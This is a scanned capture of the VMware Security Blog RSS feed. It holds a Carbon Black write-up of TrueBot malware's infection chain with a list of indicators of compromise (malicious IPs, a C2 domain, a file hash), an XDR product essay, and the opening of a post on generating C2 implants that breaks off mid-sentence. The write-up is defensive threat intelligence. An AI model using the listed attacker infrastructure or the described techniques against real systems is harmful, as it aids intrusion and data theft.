feeds.feedburner.com
Open in
urlscan Pro
2404:6800:4017:804::200e
Public Scan
URL:
http://feeds.feedburner.com/VmwareSecurityComplianceBlog
Submission: On June 15 via manual from SG — Scanned from SG
Submission: On June 15 via manual from SG — Scanned from SG
Form analysis 0 forms found in the DOM
Text Content
VMware Security Blog https://blogs.vmware.com/security Mon, 05 Jun 2023 15:58:31
+0000 en-US hourly 1 https://wordpress.org/?v=6.1.1 Carbon Black’s TrueBot
Detection
https://blogs.vmware.com/security/2023/06/carbon-blacks-truebot-detection.html?utm_source=rss&utm_medium=rss&utm_campaign=carbon-blacks-truebot-detection
Thu, 01 Jun 2023 18:34:42 +0000 https://blogs.vmware.com/security/?p=83485 Going
from E to X in Detection & Response
https://blogs.vmware.com/security/2023/05/going-from-e-to-x-in-detection-response.html?utm_source=rss&utm_medium=rss&utm_campaign=going-from-e-to-x-in-detection-response
Thu, 04 May 2023 19:36:51 +0000 https://blogs.vmware.com/security/?p=83474 It’s
Raining Implants: How to Generate C2 Framework Implants At Scale
https://blogs.vmware.com/security/2023/04/its-raining-implants-how-to-generate-c2-framework-implants-at-scale.html?utm_source=rss&utm_medium=rss&utm_campaign=its-raining-implants-how-to-generate-c2-framework-implants-at-scale
Thu, 27 Apr 2023 15:00:49 +0000 https://blogs.vmware.com/security/?p=83464
VMware Response to CVE-2023-29552 – Reflective Denial-of-Service (DoS)
Amplification Vulnerability in SLP
https://blogs.vmware.com/security/2023/04/vmware-response-to-cve-2023-29552-reflective-denial-of-service-dos-amplification-vulnerability-in-slp.html?utm_source=rss&utm_medium=rss&utm_campaign=vmware-response-to-cve-2023-29552-reflective-denial-of-service-dos-amplification-vulnerability-in-slp
Tue, 25 Apr 2023 14:08:33 +0000 https://blogs.vmware.com/security/?p=83452 Bring
Your Own Backdoor: How Vulnerable Drivers Let Hackers In
https://blogs.vmware.com/security/2023/04/bring-your-own-backdoor-how-vulnerable-drivers-let-hackers-in.html?utm_source=rss&utm_medium=rss&utm_campaign=bring-your-own-backdoor-how-vulnerable-drivers-let-hackers-in
Wed, 19 Apr 2023 17:56:42 +0000 https://blogs.vmware.com/security/?p=83445 XDR:
Identity Matters – Who You Know is As Important as What You Know
https://blogs.vmware.com/security/2023/04/xdr-identity-matters-who-you-know-is-as-important-as-what-you-know.html?utm_source=rss&utm_medium=rss&utm_campaign=xdr-identity-matters-who-you-know-is-as-important-as-what-you-know
Tue, 18 Apr 2023 15:00:02 +0000 https://blogs.vmware.com/security/?p=83441
Investigating 3CX Desktop Application Attacks: What You Need to Know
https://blogs.vmware.com/security/2023/03/investigating-3cx-desktop-application-attacks-what-you-need-to-know.html?utm_source=rss&utm_medium=rss&utm_campaign=investigating-3cx-desktop-application-attacks-what-you-need-to-know
Fri, 31 Mar 2023 16:59:31 +0000 https://blogs.vmware.com/security/?p=83435
Embedded vSphere Harbor default enablement results in an insecure configuration
https://blogs.vmware.com/security/2023/03/embedded-vsphere-harbor-default-enablement-results-in-an-insecure-configuration.html?utm_source=rss&utm_medium=rss&utm_campaign=embedded-vsphere-harbor-default-enablement-results-in-an-insecure-configuration
Fri, 31 Mar 2023 05:23:42 +0000 https://blogs.vmware.com/security/?p=83429 How
to Detect PoshC2 PowerShell Implants
https://blogs.vmware.com/security/2023/03/how-to-detect-poshc2-powershell-implants.html?utm_source=rss&utm_medium=rss&utm_campaign=how-to-detect-poshc2-powershell-implants
Fri, 24 Mar 2023 21:03:01 +0000 https://blogs.vmware.com/security/?p=83405
Unveiling the Evolution of Royal Ransomware
https://blogs.vmware.com/security/2023/03/unveiling-the-evolution-of-royal-ransomware.html?utm_source=rss&utm_medium=rss&utm_campaign=unveiling-the-evolution-of-royal-ransomware
Thu, 16 Mar 2023 20:11:57 +0000 https://blogs.vmware.com/security/?p=83390
This XML file does not appear to have any style information associated with it.
The document tree is shown below.
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/" version="2.0">
<channel>
<title>VMware Security Blog</title>
<atom:link href="https://blogs.vmware.com/security/feed" rel="self"
type="application/rss+xml"/>
<link>https://blogs.vmware.com/security</link>
<description/>
<lastBuildDate>Mon, 05 Jun 2023 15:58:31 +0000</lastBuildDate>
<language>en-US</language>
<sy:updatePeriod> hourly </sy:updatePeriod>
<sy:updateFrequency> 1 </sy:updateFrequency>
<generator>https://wordpress.org/?v=6.1.1</generator>
<item>
<title>Carbon Black’s TrueBot Detection</title>
<link>https://blogs.vmware.com/security/2023/06/carbon-blacks-truebot-detection.html?utm_source=rss&utm_medium=rss&utm_campaign=carbon-blacks-truebot-detection</link>
<dc:creator>
<![CDATA[ Fae Carlisle ]]>
...
</dc:creator>
<pubDate>Thu, 01 Jun 2023 18:34:42 +0000</pubDate>
<category>
<![CDATA[ Threat Analysis Unit ]]>
...
</category>
<guid isPermaLink="false">https://blogs.vmware.com/security/?p=83485</guid>
<description>
<![CDATA[ <div><img width="300" height="162"
src="https://blogs.vmware.com/security/files/2022/03/Malware_Featured-300x162.png"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/files/2022/03/Malware_Featured-300x162.png
300w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-1024x555.png
1024w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-768x416.png
768w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-1536x832.png
1536w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-410x222.png
410w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-600x325.png
600w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-415x225.png
415w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-585x318.png
585w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-380x207.png
380w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-222x120.png
222w, https://blogs.vmware.com/security/files/2022/03/Malware_Featured.png
1710w" sizes="(max-width: 300px) 100vw, 300px" /></div> <p>VMware’s Carbon Black
Managed Detection and Response (MDR) team began seeing a surge of TrueBot
activity in May 2023. TrueBot, otherwise known as Silence.Downloader has been
seen since at least 2017. TrueBot is under active development by Silence, with
recent versions using a Netwrix vulnerability for delivery. In this article, we
will break down what … <a
href="https://blogs.vmware.com/security/2023/06/carbon-blacks-truebot-detection.html">Continued</a></p>
<p>The post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/06/carbon-blacks-truebot-detection.html">Carbon
Black’s TrueBot Detection</a> appeared first on <a rel="nofollow"
href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]>
...
</description>
<content:encoded>
<![CDATA[ <div><img width="300" height="162"
src="https://blogs.vmware.com/security/files/2022/03/Malware_Featured-300x162.png"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/files/2022/03/Malware_Featured-300x162.png
300w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-1024x555.png
1024w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-768x416.png
768w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-1536x832.png
1536w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-410x222.png
410w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-600x325.png
600w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-415x225.png
415w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-585x318.png
585w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-380x207.png
380w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-222x120.png
222w, https://blogs.vmware.com/security/files/2022/03/Malware_Featured.png
1710w" sizes="(max-width: 300px) 100vw, 300px" /></div><p>VMware’s Carbon Black
Managed Detection and Response (MDR) team began seeing a surge of TrueBot
activity in May 2023. TrueBot, otherwise known as Silence.Downloader has been
seen since at least 2017. TrueBot is under active development by Silence, with
recent versions using a Netwrix vulnerability for delivery. In this article, we
will break down what we have seen in customers’ environments and how Carbon
Black MDR detects and responds to the threat.</p> <h2>History</h2> <p>Just as
its name suggests, TrueBot is a downloader trojan botnet that uses command and
control servers to collect information on compromised systems and uses that
compromised system as a launching point for further attacks, as seen recently
with Clop Ransomware.</p> <p>TrueBot was known for using malicious emails to
drop their malware but was recently seen using a Netwrix vulnerability as their
delivery method. VMware’s MDR team has seen this vulnerability used firsthand in
customer environments, as explored below. TrueBot is also using Raspberry Robin
(a worm) as a delivery vector.</p> <p>While Silence Group is known for targeting
banks and financial institutions, TrueBot has also been seen targeting the
education sector. In the Carbon Black Detection & Notable Attacks section,
we break down the sectors that we have seen targeted from our platform.</p>
<h2>Attribution</h2> <p>Though a threat actor group called Silence Group is
attributed to this malware, Group-IB has linked the group with Russia’s EvilCorp
(Indrik Spider) due to the downloaders they use being similar. The MDR team has
explored this link and has not found substantial evidence to back this
claim.</p> <p>Researchers thought EvilCorp to be linked to TrueBot due to
TrueBot dropping FlawedGrace. FlawedGrace is malware that is attributed to
EvilCorp. Though TrueBot drops this payload, the malware operators could
purchase access to this tool directly from EvilCorp. Another link explored was
TrueBot dropping Clop Ransomware, which was previously used by EvilCorp.
However, Clop is ransomware-as-a-service, so anyone can purchase access to this
tool. Lastly, Silence is a Russian-speaking cybercriminal group that uses
Russian web hosting services. Though EvilCorp is also Russian, this is not
strong evidence to link the two, as there are dozens of Russian APTs.</p> <p>Due
to these findings, we cannot say for sure whether EvilCorp and TrueBot are
connected.</p> <h2>Carbon Black Detection</h2> <p>Carbon Black is very effective
at detecting TrueBot and its associated activity. This section will focus on
what Carbon Black detected and the visibility into the attack process.</p> <p><a
href="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.27.03-AM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83489"
src="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.27.03-AM-1024x137.png"
alt="" width="900" height="120"
srcset="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.27.03-AM-1024x137.png
1024w,
https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.27.03-AM-300x40.png
300w,
https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.27.03-AM-768x102.png
768w,
https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.27.03-AM-1536x205.png
1536w,
https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.27.03-AM-600x80.png
600w,
https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.27.03-AM.png
1920w" sizes="(max-width: 900px) 100vw, 900px" /></a></p> <p><em>Figure 1.1
Process Chain</em></p> <p>The infection appeared to have started with a
drive-by-download from Chrome for the executable ‘update.exe’.</p> <p><a
href="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.26.09-AM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83488"
src="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.26.09-AM-1024x253.png"
alt="" width="800" height="198"
srcset="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.26.09-AM-1024x253.png
1024w,
https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.26.09-AM-300x74.png
300w,
https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.26.09-AM-768x190.png
768w,
https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.26.09-AM-600x148.png
600w,
https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.26.09-AM.png
1132w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><i>Figure 1.2
Update.exe being downloaded</i></p> <p>A user had to click on this in order to
execute the malware. Upon execution, the malware immediately begins to look for
EDR and antivirus software.</p> <p><a
href="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.25.33-AM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83487"
src="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.25.33-AM-1024x201.png"
alt="" width="800" height="157"
srcset="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.25.33-AM-1024x201.png
1024w,
https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.25.33-AM-300x59.png
300w,
https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.25.33-AM-768x151.png
768w,
https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.25.33-AM-600x118.png
600w,
https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.25.33-AM.png
1038w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><i>Figure 1.3
Looking for EDR/AV</i></p> <p>Once executed, it connected to 94[.]142.138.61IP,
which is a Russian IP address that is known to be attributed to TrueBot. At the
address, the executable ‘3ujwy2rz7v.exe’ was downloaded and then launched by
cmd.exe.</p> <p><a
href="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.24.41-AM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83486"
src="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.24.41-AM-1024x351.png"
alt="" width="800" height="274"
srcset="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.24.41-AM-1024x351.png
1024w,
https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.24.41-AM-300x103.png
300w,
https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.24.41-AM-768x263.png
768w,
https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.24.41-AM-600x206.png
600w,
https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.24.41-AM.png
1184w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><i>Figure 1.4
3ujwy2rz7v.exe activity</i></p> <p>The executable then connected to the C2
domain name ‘dremmfyttrred[.]com’.</p> <p>The activity thereafter included dumps
of LSASS, exfiltration of data, and system and process enumerations.</p>
<p>Managed Detection and Response stops this activity through first the
detection of the activity and then the implementation of system quarantines,
hash banning, policy reviews, and policy modifications. Customers are informed
of the observed activity and actions taken by the team every step of the
way.</p> <h2>Indicators of Compromise</h2> <ul> <li
aria-level="1">45.182.189[.]103</li> <li aria-level="1">Dremmfyttrred.com</li>
<li aria-level="1">94.142.138[.]61</li> <li aria-level="1">Locations: Russia,
Panama</li> <li aria-level="1">Update.exe</li> <li
aria-level="1">Document_26_apr_2443807.exe</li> <li
aria-level="1">fe746402c74ac329231ae1b5dffa8229b509f4c15a0f5085617f14f0c1579040</li>
<li aria-level="1">172.64.155[.]188</li> <li aria-level="1">104.18.32[.]68</li>
<li aria-level="1">3ujwy2rz7v.exe</li> </ul> <h2>Summary</h2> <p>TrueBot can be
a particularly nasty infection for any network. When an organization is infected
with this malware, it can quickly escalate to become a bigger infection, similar
to how ransomware spreads throughout a network. Carbon Black is able to quickly
detect TrueBot and its associated activity and, with the help of MDR, be able to
detect and contain it early in the attack chain before the threat
escalates.</p><p>The post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/06/carbon-blacks-truebot-detection.html">Carbon
Black’s TrueBot Detection</a> appeared first on <a rel="nofollow"
href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]>
...
</content:encoded>
...
</item>
<item>
<title>Going from E to X in Detection & Response</title>
<link>https://blogs.vmware.com/security/2023/05/going-from-e-to-x-in-detection-response.html?utm_source=rss&utm_medium=rss&utm_campaign=going-from-e-to-x-in-detection-response</link>
<dc:creator>
<![CDATA[ Simon Perry ]]>
...
</dc:creator>
<pubDate>Thu, 04 May 2023 19:36:51 +0000</pubDate>
<category>
<![CDATA[ Modern Apps Security ]]>
...
</category>
<guid isPermaLink="false">https://blogs.vmware.com/security/?p=83474</guid>
<description>
<![CDATA[ <div><img width="300" height="169"
src="https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-300x169.jpg"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-300x169.jpg
300w,
https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-1024x576.jpg
1024w,
https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-768x432.jpg
768w,
https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-1536x864.jpg
1536w,
https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-2048x1152.jpg
2048w,
https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-600x338.jpg
600w" sizes="(max-width: 300px) 100vw, 300px" /></div> <p>The first SOC I toured
was that of a major US bank, circa 2000. That SOC, and the many others I’ve
stepped foot in since relied heavily on a SIEM to play the twin roles of
centralized data collection and correlation. Later SOAR platforms were developed
as richer and more capable automation engines, based on … <a
href="https://blogs.vmware.com/security/2023/05/going-from-e-to-x-in-detection-response.html">Continued</a></p>
<p>The post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/05/going-from-e-to-x-in-detection-response.html">Going
from E to X in Detection & Response</a> appeared first on <a rel="nofollow"
href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]>
...
</description>
<content:encoded>
<![CDATA[ <div><img width="300" height="169"
src="https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-300x169.jpg"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-300x169.jpg
300w,
https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-1024x576.jpg
1024w,
https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-768x432.jpg
768w,
https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-1536x864.jpg
1536w,
https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-2048x1152.jpg
2048w,
https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-600x338.jpg
600w" sizes="(max-width: 300px) 100vw, 300px" /></div><p><span
data-contrast="auto">The first SOC I toured was that of a major US bank, circa
2000. That SOC, and the many others I’ve stepped foot in since relied heavily on
a SIEM to play the twin roles of centralized data collection and correlation.
Later SOAR platforms were developed as richer and more capable automation
engines, based on the SIEM data set.</span><span
data-ccp-props="{}"> </span></p> <p><span data-contrast="auto">However, being
log-driven SIEM/SOARs are wholly reliant on an upstream control (firewall, etc.)
reliably detecting anomalous activity and logging an event to the SIEM.
Attackers focus keenly on avoiding such detection. Visibility gaps are all too
common, and through those gaps and blind spots, attackers slip to steal,
disrupt, and destroy. It has become increasingly obvious that SIEMs are reliable
platforms for the sort of information called for by compliance requirements, but
are sadly lacking as a primary, front-line tool for threat detection and threat
hunting. </span><span data-ccp-props="{}"> </span></p> <h2>Enter EDR</h2>
<p><span data-contrast="auto">The only constant in security is change; attackers
research and employ new TTPs while defenders develop deeper skills, new
processes, and better tools. One such game-changing tool developed to provide
defenders with a far richer telemetry set than defenders ever enjoyed before was
EDR. Carbon Black invented and shipped to market the first commercial EDR even
before Gartner Analyst Anton Chuvakin “named” the market segment back in
2013</span><span data-contrast="auto">. EDR shone a light into the details of
what attackers were attempting to do on an endpoint and server, eliminating a
dangerous blind spot where 40% of attacks start and end.</span><span
data-ccp-props="{}"> </span></p> <p><span data-contrast="auto">EDR’s place as a
foundation for the modern SOC is now almost universally recognized, and its
ability to gather and analyze detailed telemetry to detect anomalous behavior on
endpoints has been modeled and applied to the realms of the network and
identity. It is not unusual to find in more mature SOCs network detection
(typically standalone NDR and PCAP tools), and identity analysis (usually UEBA)
deployed alongside EDR (and the still ubiquitous SIEM/SOAR). </span><span
data-ccp-props="{}"> </span></p> <p><span data-contrast="auto">The challenge
though for the typical SOC is twofold: firstly that until now capture and
analysis of network traffic typically required expensive hardware in the form of
packet brokers and network taps; and secondly the burden of bringing together
three different and disparate data sources (EDR, network, and identity) and
effectively using them to detect and respond to an attack early and accurately
fell on the shoulders of the SOC Analyst, leading to stress, burnout, and missed
signals.</span><span data-ccp-props="{}"> </span></p> <p><span
data-contrast="auto">Together endpoint, network, and identity telemetry provide
a powerful detective triad for SOC Analysts to use to find attacks, but
defenders need a better way than to rely on standalone EDR, NDR, and
UEBA. </span><span data-ccp-props="{}"> </span></p> <h2>Enter XDR<span
data-ccp-props="{}"><br /> </span></h2> <p><span data-contrast="auto">XDR
(E</span><span data-contrast="auto">x</span><span data-contrast="auto">tended
</span><span data-contrast="auto">D</span><span data-contrast="auto">etection
& </span><span data-contrast="auto">R</span><span
data-contrast="auto">esponse) provides the means to combine endpoint, network,
and identity data. XDR is the logical next step from EDR and delivers enrichment
of captured data by mapping it to the MITRE ATT&CK framework of TTPs and
adding appropriate meta-data tags, the correlation across the three data types,
and automatic response to an alert. XDR also provides a deep, broad, and
forensically useful data trail useful for root cause analysis of an
attack.</span><span data-ccp-props="{}"> </span></p> <p><span
data-contrast="auto">Like any new tool introduced by our industry, XDR is often
“different things to different people” and there remains some confusion as to
what XDR is and is not. Let’s clear that up.</span><span
data-ccp-props="{}"> </span></p> <p><span data-contrast="auto">XDR does not
replace the SIEM/SOAR, which remains useful as a central data store for
compliance reporting and for some forensic activities. Organizations have
typically invested significant time, effort, and money in the operationalization
of SIEM and SOAR. It is unreasonable to expect that they will rip and replace
the SIEM and SOAR to achieve XDR. </span><span data-ccp-props="{}"> </span></p>
<p><span data-contrast="auto">Nor should XDR require the addition of yet more
disparate tools. A shocking statistic is that on average a typical organization
has 47 security tools deployed, and 70% have added five tools in the last twelve
months. Considering that trend it ought not be surprising that 95% of attacks
involve a vulnerability or blind spot available to the attacker to exploit due
to misconfiguration and misalignment between the many controls </span><span
data-contrast="auto">2</span><span data-contrast="auto">. Further, I would argue
that anyone new security control needs to replace two or more existing controls;
we need to simplify and improve the SOC Analyst experience, not add to the
confusion and the management burden.</span><span
data-ccp-props="{}"> </span></p> <p><span data-contrast="auto">In delivering
</span><a
href="https://carbonblack.vmware.com/carbon-black-xdr-activity-path"><span
data-contrast="auto">VMware </span><span data-contrast="none">Carbon Black
XDR</span></a><span data-contrast="auto"> to market we have built on our legacy
as a pioneer in EDR. Carbon Black XDR transforms a fleet of endpoints into a
distributed mesh of network sensors, each collecting endpoint, network, and
identity telemetry, streaming that to the Carbon Black Cloud where we natively
correlate, enrich, and analyze these three data sources. All without network
configuration changes, without the need for expensive network taps and packet
brokers, both of which are architecturally unsuited for the post-COVID,
distributed workforce, and multi-cloud world we now live in. </span><span
data-ccp-props="{}"> </span></p> <p><span data-contrast="auto">Carbon Black XDR
provides the SOC Analyst more visibility. Our approach to XDR adds network and
identity telemetry to the existing EDR data, providing the means to identify
hidden & highly sophisticated attacks. Carbon Black XDR speeds Mean Time To
Detect and Respond (MTTD/MTTR) and allows the SOC to better track and understand
attacks that target multiple systems. Importantly, Carbon Black XDR is by design
an open ecosystem; integrating with and adding value to the existing SIEM and
SOAR, and follows a design philosophy that there will be third-party tools and
additional data sources that will further extend XDR. </span><span
data-ccp-props="{}"> </span></p> <p><span data-contrast="auto">In summary; XDR
builds on and is a natural and logical extension to EDR. It neither replaces
SIEM/SOAR nor should require you to add yet more disparate tools. In fact, the
idea of relying on hardware tap-based approaches to capturing network traffic
just doesn’t work today, given our approach to production workload architecture
and to the way end users connect from anywhere. </span><span
data-ccp-props="{}"> </span></p> <p><span data-contrast="auto">You may hear
varying definitions of XDR over the coming months as this industry sector gains
prominence. To cut through all that just keep asking the same two questions:
“Will I be required to add more complexity and burden to my SOC by adding more
tools?”; and “Am I being asked to rip and replace trusted tools that I have
already invested so much in?”. </span><span data-ccp-props="{}"> </span></p>
<p><span data-contrast="auto">Improving the SOC Analyst experience requires an
evolution from EDR to XDR, but at VMware Carbon Black we don’t believe it should
require a change to everything you do.</span><span
data-ccp-props="{}"> </span></p><p>The post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/05/going-from-e-to-x-in-detection-response.html">Going
from E to X in Detection & Response</a> appeared first on <a rel="nofollow"
href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]>
...
</content:encoded>
...
</item>
<item>
<title>It’s Raining Implants: How to Generate C2 Framework Implants At
Scale</title>
<link>https://blogs.vmware.com/security/2023/04/its-raining-implants-how-to-generate-c2-framework-implants-at-scale.html?utm_source=rss&utm_medium=rss&utm_campaign=its-raining-implants-how-to-generate-c2-framework-implants-at-scale</link>
<dc:creator>
<![CDATA[ Sebastiano Mariani ]]>
...
</dc:creator>
<pubDate>Thu, 27 Apr 2023 15:00:49 +0000</pubDate>
<category>
<![CDATA[ Threat Analysis Unit ]]>
...
</category>
<guid isPermaLink="false">https://blogs.vmware.com/security/?p=83464</guid>
<description>
<![CDATA[ <div><img width="300" height="162"
src="https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222-300x162.png"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222-300x162.png
300w,
https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222.png
410w" sizes="(max-width: 300px) 100vw, 300px" /></div> <p>Command-and-control
(C2) frameworks serve as a means to remotely manage and access compromised
devices. They allow for the creation of various payload types, called implants,
that are dropped on victim machines by attackers, enabling them to retain access
and control over the infected victim. While legitimate penetration testing
utilizes C2 frameworks to evaluate system security … <a
href="https://blogs.vmware.com/security/2023/04/its-raining-implants-how-to-generate-c2-framework-implants-at-scale.html">Continued</a></p>
<p>The post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/04/its-raining-implants-how-to-generate-c2-framework-implants-at-scale.html">It’s
Raining Implants: How to Generate C2 Framework Implants At Scale</a> appeared
first on <a rel="nofollow" href="https://blogs.vmware.com/security">VMware
Security Blog</a>.</p> ]]>
...
</description>
<content:encoded>
<![CDATA[ <div><img width="300" height="162"
src="https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222-300x162.png"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/files/20 ]]>
<![CDATA[ 22/05/Threat-Analysis-Unit_410x222-300x162.png 300w,
https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222.png
410w" sizes="(max-width: 300px) 100vw, 300px" /></div><p><span
data-contrast="none">Command-and-control (C2) frameworks serve as a means to
remotely manage and access ]]>
<![CDATA[ compromised devices. They allow for the creation of various payload
types, called implants, that are dropped on victim machines by attackers,
enabling them to retain access and control over the infected victim.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335 ]]>
<![CDATA[ 559740":259}"> </span></p> <p><span data-contrast="none">While
legitimate penetration testing utilizes C2 frameworks to evaluate system
security and identify potential attacks, cyber-criminals have also taken
advantage of these tools for malicious purposes. The likes of Cobalt Strike,
Metasplo ]]>
<![CDATA[ it, and Brute Ratel have become increasingly popular in breaching
enterprise networks.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-contrast="none">For a better understanding of how C2 frameworks
operate, refer ]]>
<![CDATA[ to </span><span data-contrast="auto">Figure 1</span><span
data-contrast="none">, which presents a simplified scenario of a compromised
machine.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-ccp-props="{"13 ]]>
<![CDATA[
4245418":true,"201341983":0,"335551550":2,"335551620":2,"335559739":160,"335559740":259}"><a
href="https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-2.58.44-PM.png"><img
decoding="async" loading="lazy" class="alignnone wp ]]>
<![CDATA[ -image-83465"
src="https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-2.58.44-PM-1024x891.png"
alt="" width="800" height="696"
srcset="https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-2.58.44-PM-1024x891.png
1024w, https://blogs.vmware.com/security/fil ]]>
<![CDATA[ es/2023/04/Screen-Shot-2023-04-26-at-2.58.44-PM-300x261.png 300w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-2.58.44-PM-768x669.png
768w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-2.58.44-PM-600x522.png
600w, https://blogs.vmware.com/sec ]]>
<![CDATA[ urity/files/2023/04/Screen-Shot-2023-04-26-at-2.58.44-PM.png 1220w"
sizes="(max-width: 800px) 100vw, 800px" /></a></span></p> <p><i><span
data-contrast="none">Figure </span></i><i><span
data-contrast="none">1</span></i><i><span data-contrast="none">: How C2
frameworks operate.</span></i><span data-c ]]>
<![CDATA[
cp-props="{"201341983":0,"335551550":2,"335551620":2,"335559739":200,"335559740":240}"> </span></p>
<p><span data-contrast="none">Appropriate firewall configurations and robust
endpoint protection systems can aid in preventing scenarios like this, b ]]>
<![CDATA[ ut attackers can customize implants to increase the likelihood of
flying under the radar. For instance, attackers can modify network traffic to
